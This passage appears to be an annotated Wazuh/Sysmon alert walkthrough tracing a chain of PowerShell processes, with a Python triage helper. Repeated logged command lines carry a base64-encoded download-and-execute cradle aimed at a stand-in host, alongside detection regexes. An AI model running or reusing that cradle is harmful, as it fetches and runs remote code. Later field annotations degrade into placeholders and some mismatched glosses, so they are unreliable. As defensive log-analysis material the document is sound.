data.win.system.eventID: 11 Event ID within the provider. For Sysmon: 1 = ProcessCreate, 3 = NetworkConnect, 11 = FileCreate. Different numbering from the Security log (4624, 4688), so always read it together with providerName.
data.win.system.version: 2 Schema version of the event. It differs per Event ID (FileCreate is v2, ProcessCreate v5 on this host) and bumps when Sysmon adds fields, so a parser must not assume a fixed field list.
data.win.system.level: 4 Windows event level (1 Critical, 2 Error, 3 Warning, 4 Informational, 5 Verbose). Sysmon writes everything at 4, so it says nothing about how bad the event is; use the Wazuh rule level for that.
data.win.system.task: 11 Task category. For Sysmon the task number mirrors the Event ID (11 = FileCreate), unlike the Security log where it names a category such as Logon or Policy Change.
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:35:35.0179313Z Time the event was written to the event log (UTC, ISO 8601). Expect it milliseconds to about a second after data.win.eventdata.utcTime, which is when Sysmon saw the action; a large gap means delayed logging or a clock problem.
data.win.system.eventRecordID: 282012 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 PID of the process that wrote the event, i.e. the Sysmon service, not the process the event describes. It is the same 3712 on every Sysmon event from this host; the PID you care about is data.win.eventdata.processId.
data.win.system.threadID: 4740 Thread of the Sysmon service that logged the event. Same caveat as processID: it is not the suspicious process.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational Event log channel the event was read from. This is Sysmon's own log; open it on the host (Event Viewer, or Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational) to see the neighbouring events no rule fired on.
data.win.system.computer: Attacker Hostname Windows stamped on the event. It should match agent.name; if it does not, the agent is forwarding another machine's logs.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:35:34.965
ProcessGuid: {94294ddc-bcb5-680a-9e0a-000000000e00}
ProcessId: 6588
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_4kimfx2r.qot.ps1
CreationUtcTime: 2025-04-24 22:35:34.965
User: Attacker\Attcker1" Full rendered text of the Sysmon event, as Event Viewer shows it. Every line in it is also available parsed under data.win.eventdata.*, so query those fields and use this one for reading.
data.win.eventdata.utcTime: 2025-04-24 22:35:34.965 Time Sysmon observed the file create (UTC). Use this, not systemTime, when building the timeline. It lands about a second after the ProcessCreate of PID 6588 in the previous alert, which is the start-up sequence of that PowerShell.
data.win.eventdata.processGuid: {94294ddc-bcb5-680a-9e0a-000000000e00} Sysmon's unique ID for the creating process, derived from the machine GUID and the process start time. PIDs are reused after exit, GUIDs are not: pivot on this to pull every event for exactly this process. The same GUID is the processGuid of the previous ProcessCreate alert.
data.win.eventdata.processId: 6588 Windows PID of the process that created the file. Good for matching within a short window; prefer processGuid for joins.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe Full path of the executable that created the file, here the built-in Windows PowerShell 5.1 engine in its expected location.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_4kimfx2r.qot.ps1 Path of the file that was created. __PSScriptPolicyTest_<random>.ps1 in the user's %TEMP% is a known benign artifact: every Windows PowerShell start writes a throwaway script there to test whether AppLocker/WDAC script enforcement applies, then removes it. On its own it is not a dropped tool, so this alert really tells you that PowerShell was launched; the ProcessCreate alert for the same processGuid is where the judgement is made.
data.win.eventdata.creationUtcTime: 2025-04-24 22:35:34.965 Creation timestamp of the file on disk. Equal to utcTime here, as expected for a brand-new file; if it were earlier than utcTime, an existing file was overwritten or its timestamp was tampered with.
data.win.eventdata.user: Attacker\\Attcker1 Account the creating process ran as: a local account on the host named Attacker. The misspelling is in the username itself, not a parsing error.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
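The ProcessCreate and FileCreate alerts above are easier to judge with a few lines of code than by eye. The Python helper below is an added example, not code from Wazuh or from this page's author: it decodes the -EncodedCommand argument (base64 of the script's UTF-16LE bytes), walks parentProcessGuid links to rebuild the PowerShell chain root-first, and separates the __PSScriptPolicyTest_*.ps1 start-up artifacts from any other file create. The ALERTS records are constructed from the values printed on this page and carry only the fields the helpers use; their keys are the data.win.eventdata.* names with the prefix dropped, plus eventID.

```python
"""Triage helpers for the Sysmon alerts on this page.

Added example, not code from Wazuh or from this page's author. The records
in ALERTS are constructed from values printed on the page, reduced to the
fields the helpers need.
"""
import base64
import re

PS = r"C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe"
TEMP = r"C:\Users\Attcker1\AppData\Local\Temp"
# -EncodedCommand value copied from the ProcessCreate alerts on this page.
ENC = "SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA"
CMDLINE = f'"{PS}" "{PS}" -NoLogo -NoProfile -EncodedCommand {ENC}'


def ev1(guid, pid, parent_guid, utc):
    """A Sysmon EID 1 (ProcessCreate) record built from page values."""
    return {"eventID": "1", "processGuid": guid, "processId": pid,
            "parentProcessGuid": parent_guid, "utcTime": utc,
            "image": PS, "commandLine": CMDLINE}


def ev11(guid, pid, target, utc):
    """A Sysmon EID 11 (FileCreate) record built from page values."""
    return {"eventID": "11", "processGuid": guid, "processId": pid,
            "targetFilename": target, "utcTime": utc, "image": PS}


# Constructed from the alerts on this page, in the order they appear.
ALERTS = [
    ev11("{94294ddc-bcad-680a-970a-000000000e00}", "9580",
         TEMP + r"\__PSScriptPolicyTest_sqqlcpdl.oin.ps1", "2025-04-24 22:35:27.354"),
    ev1("{94294ddc-bcb3-680a-9b0a-000000000e00}", "2732",
        "{94294ddc-bcb0-680a-990a-000000000e00}", "2025-04-24 22:35:31.218"),
    ev11("{94294ddc-bcb3-680a-9b0a-000000000e00}", "2732",
         TEMP + r"\__PSScriptPolicyTest_okjzviqs.4g5.ps1", "2025-04-24 22:35:32.449"),
    ev1("{94294ddc-bcb5-680a-9e0a-000000000e00}", "6588",
        "{94294ddc-bcb3-680a-9b0a-000000000e00}", "2025-04-24 22:35:33.635"),
    ev11("{94294ddc-bcb5-680a-9e0a-000000000e00}", "6588",
         TEMP + r"\__PSScriptPolicyTest_4kimfx2r.qot.ps1", "2025-04-24 22:35:34.965"),
    ev1("{94294ddc-bcb8-680a-a00a-000000000e00}", "13524",
        "{94294ddc-bcb5-680a-9e0a-000000000e00}", "2025-04-24 22:35:36.031"),
]

# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...).
# -ExecutionPolicy does not match because no whitespace follows "-e".
ENCODED_FLAG = re.compile(r"-e(?:c|n[a-z]*)?\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)

# Written by PowerShell on every start to probe AppLocker/WDAC script
# enforcement; on its own it is not a dropped tool.
POLICY_TEST = re.compile(
    r"\\AppData\\Local\\Temp\\__PSScriptPolicyTest_[^\\]+\.psm?1$", re.IGNORECASE)


def decode_encoded_command(cmdline):
    """Return the script behind -EncodedCommand (base64 of UTF-16LE), or None."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None  # not base64/UTF-16LE after all, or truncated in the log


def is_policy_test_artifact(path):
    """True for PowerShell's own __PSScriptPolicyTest_*.ps1/.psm1 temp files."""
    return POLICY_TEST.search(path) is not None


def process_chain(alerts, leaf_guid):
    """Follow parentProcessGuid links upward from leaf_guid and return the
    ProcessCreate records root-first. Keyed on GUIDs because PIDs are reused."""
    by_guid = {a["processGuid"]: a for a in alerts if a["eventID"] == "1"}
    chain, guid, seen = [], leaf_guid, set()
    while guid in by_guid and guid not in seen:
        seen.add(guid)
        chain.append(by_guid[guid])
        guid = by_guid[guid]["parentProcessGuid"]
    chain.reverse()
    return chain


def triage(alerts):
    """One-pass summary of what the alerts actually show."""
    creates = [a for a in alerts if a["eventID"] == "1"]
    leaf = max(creates, key=lambda a: a["utcTime"])  # newest ProcessCreate
    chain = process_chain(alerts, leaf["processGuid"])
    files = [a["targetFilename"] for a in alerts if a["eventID"] == "11"]
    return {
        "decoded_command": decode_encoded_command(leaf["commandLine"]),
        "chain_pids": [a["processId"] for a in chain],
        # Parent of the chain's first known link; its ProcessCreate is not on the page.
        "unresolved_root": chain[0]["parentProcessGuid"],
        "benign_policy_tests": [f for f in files if is_policy_test_artifact(f)],
        "real_drops": [f for f in files if not is_policy_test_artifact(f)],
    }


if __name__ == "__main__":
    for key, value in triage(ALERTS).items():
        print(f"{key}: {value}")
```

Run as a script it prints the decoded cradle, the chain 2732 -> 6588 -> 13524, the GUID of the parent that is missing from the page (the next thing to search for), and three policy-test files with no real drop. For live data, json.loads each Wazuh alert and map data.win.eventdata.* onto the same keys; the helpers do not care where the records came from.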
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first and treat it as the alert's headline. Third consecutive hit: the child of the previous ProcessCreate (PID 6588) is now the parent, so the chain keeps growing.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 14 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534211.894465 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon ETW provider that generated the event, here Sysmon. Tells you which event schema the IDs below belong to.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} GUID of that provider; {5770385f-c22a-43e0-bf4c-06f5698ffbd9} is Microsoft-Windows-Sysmon. Stable across Sysmon versions, so a safe filter key.
data.win.system.eventID: 1 Event ID within the provider. For Sysmon: 1 = ProcessCreate, 3 = NetworkConnect, 11 = FileCreate. Different numbering from the Security log (4624, 4688), so always read it together with providerName.
data.win.system.version: 5 Schema version of the event. It differs per Event ID (ProcessCreate is v5, FileCreate v2 on this host) and bumps when Sysmon adds fields, so a parser must not assume a fixed field list.
data.win.system.level: 4 Windows event level (1 Critical, 2 Error, 3 Warning, 4 Informational, 5 Verbose). Sysmon writes everything at 4, so it says nothing about how bad the event is; use the Wazuh rule level for that.
data.win.system.task: 1 Task category. For Sysmon the task number mirrors the Event ID (1 = ProcessCreate), unlike the Security log where it names a category such as Logon or Policy Change.
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:35:37.4234296Z Time the event was written to the event log (UTC, ISO 8601). Here it is about 1.4 seconds after data.win.eventdata.utcTime, which is when Sysmon saw the process start; a much larger gap means delayed logging or a clock problem.
data.win.system.eventRecordID: 282035 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:35:36.031
ProcessGuid: {94294ddc-bcb8-680a-a00a-000000000e00}
ProcessId: 13524
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-bcb5-680a-9e0a-000000000e00}
ParentProcessId: 6588
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:35:36.031 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bcb8-680a-a00a-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 13524 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-bcb5-680a-9e0a-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 6588 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 18 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534211.902531 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:35:37.5822494Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 282037 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:35:37.562
ProcessGuid: {94294ddc-bcb8-680a-a00a-000000000e00}
ProcessId: 13524
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_lrtfiacg.ym4.ps1
CreationUtcTime: 2025-04-24 22:35:37.562
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:35:37.562 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bcb8-680a-a00a-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 13524 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_lrtfiacg.ym4.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:35:37.562 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534212.905299 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Security-Auditing No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {54849625-5478-4994-a5ba-3e3b0328c30d} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 4624 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 3 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 12544 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8020000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:35:38.3328294Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 43822 Incremental log record number – handy for timeline order.
data.win.system.processID: 792 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 2060 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Security No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: AUDIT_SUCCESS TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "An account was successfully logged on.
Subject:
Security ID: S-1-5-18
Account Name: ATTACKER$
Account Domain: WORKGROUP
Logon ID: 0x3E7
Logon Information:
Logon Type: 5
Restricted Admin Mode: -
Remote Credential Guard: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: S-1-5-18
Account Name: SYSTEM
Account Domain: NT AUTHORITY
Logon ID: 0x3E7
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {00000000-0000-0000-0000-000000000000}
Process Information:
Process ID: 0x304
Process Name: C:\Windows\System32\services.exe
Network Information:
Workstation Name: -
Source Network Address: -
Source Port: -
Detailed Authentication Information:
Logon Process: Advapi
Authentication Package: Negotiate
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested." No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserName: ATTACKER$ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectDomainName: WORKGROUP No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserName: SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetDomainName: NT AUTHORITY No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonType: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonProcessName: Advapi No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.authenticationPackageName: Negotiate No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {00000000-0000-0000-0000-000000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.keyLength: 0 Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.
data.win.eventdata.processId: 0x304 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processName: C:\\Windows\\System32\\services.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.impersonationLevel: %%1833 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.virtualAccount: %%1843 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLinkedLogonId: 0x0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.elevatedToken: %%1842 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 15 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534212.912635 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
